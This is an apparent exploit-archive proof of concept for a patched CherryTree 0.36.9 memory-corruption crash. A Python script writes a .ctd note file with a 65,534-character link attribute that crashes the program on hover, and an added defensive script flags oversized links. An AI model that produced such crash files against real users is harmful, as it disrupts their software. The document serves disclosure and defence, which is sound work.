43 lines
No EOL
1.4 KiB
Python
Executable file
#!/usr/bin/python

### CherryTree 0.36.9 - Memory Corruption PoC by n30m1nd ###

# Date: 2016-10-27
# PoC Author: n30m1nd
# Vendor Homepage: http://www.giuspen.com/cherrytree/
# Software Link: http://www.giuspen.com/software/cherrytree_0.36.9_setup.exe
# Version: Affects all versions of CherryTree prior to 0.37.6
# Tested on: Win7 64bit and Win10 64bit

# Credits
# =======
# Thanks to Giuseppe Penone for this invaluable piece of free, open source software and also for quickly patching this vuln.
# Shouts to the crew at Offensive Security for their huge efforts on making the infosec community better

# How to
# ======
# * Run this python script. It will generate a "PoC-1.ctd" file.
# * Open the file and hover over the link.

# Bonus
# =====
# It will also crash if you click on the link (but it will also make your graphic drivers stop working sometimes...)

# Why?
# ====
# From what we have seen debugging the crash (thanks R0c0!), it happens inside libcairo2.0.dll due to a null pointer dereference when
# trying to draw the contents of the graphical bitmaps.

# Exploit code
# ============

# A minimal CherryTree document (.ctd is plain XML) with one node whose
# rich_text "link" attribute is roughly 64 KiB long.
crashfile = '''<?xml version="1.0" ?>
<cherrytree>
<node custom_icon_id="0" foreground="" is_bold="False" name="PoC" prog_lang="custom-colors" readonly="False" tags="" unique_id="1">
<rich_text link="node 1 ''' + "A" * 65534 + '''">MOUSE OVER THIS</rich_text>
</node>
</cherrytree>
'''

# The with-block closes the file on exit, so no explicit close() is needed.
with open("PoC-1.ctd", 'w') as f:
    f.write(crashfile)
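The "Why?" and "Exploit code" sections above show that the trigger is an abnormally long `link` attribute on a `rich_text` element. As an added defensive check (not part of n30m1nd's PoC or of CherryTree itself), the following script parses a .ctd document and flags any link attribute longer than an assumed threshold before the file is opened in a vulnerable version; `MAX_LINK_LEN`, the sample documents and the function names are all constructed for this example.

```python
#!/usr/bin/env python3
"""Pre-open check for CherryTree .ctd files (added example, not project code):
report rich_text link attributes long enough to match the crash pattern."""
import xml.etree.ElementTree as ET

# Assumed threshold: real node/web links are a few hundred bytes at most,
# while the PoC above uses a 65534-character payload.
MAX_LINK_LEN = 4096


def find_oversized_links(ctd_xml: str, limit: int = MAX_LINK_LEN):
    """Return a list of (node_name, link_length) for every rich_text whose
    link attribute exceeds `limit`. A document the parser cannot read is
    reported as ("<unparseable>", -1) so it is never silently treated as clean."""
    try:
        root = ET.fromstring(ctd_xml)
    except ET.ParseError:
        return [("<unparseable>", -1)]
    findings = []
    for node in root.iter("node"):
        name = node.get("name", "<unnamed>")
        for rt in node.iter("rich_text"):
            link = rt.get("link")
            if link is not None and len(link) > limit:
                findings.append((name, len(link)))
    return findings


def is_safe_to_open(ctd_xml: str, limit: int = MAX_LINK_LEN) -> bool:
    """True when no finding was produced for the document."""
    return not find_oversized_links(ctd_xml, limit)


# Constructed samples: a benign note and one shaped like the PoC above.
BENIGN = ('<?xml version="1.0" ?><cherrytree><node name="notes" unique_id="1">'
          '<rich_text link="node 1">go to node 1</rich_text>'
          '</node></cherrytree>')
SUSPECT = ('<?xml version="1.0" ?><cherrytree><node name="PoC" unique_id="1">'
           '<rich_text link="node 1 ' + "A" * 65534 + '">MOUSE OVER THIS</rich_text>'
           '</node></cherrytree>')

if __name__ == "__main__":
    for label, doc in (("benign", BENIGN), ("suspect", SUSPECT)):
        print(label, "safe" if is_safe_to_open(doc) else find_oversized_links(doc))
```

The length check is a heuristic keyed to this specific crash; the durable fix is upgrading to CherryTree 0.37.6 or later, as the header notes.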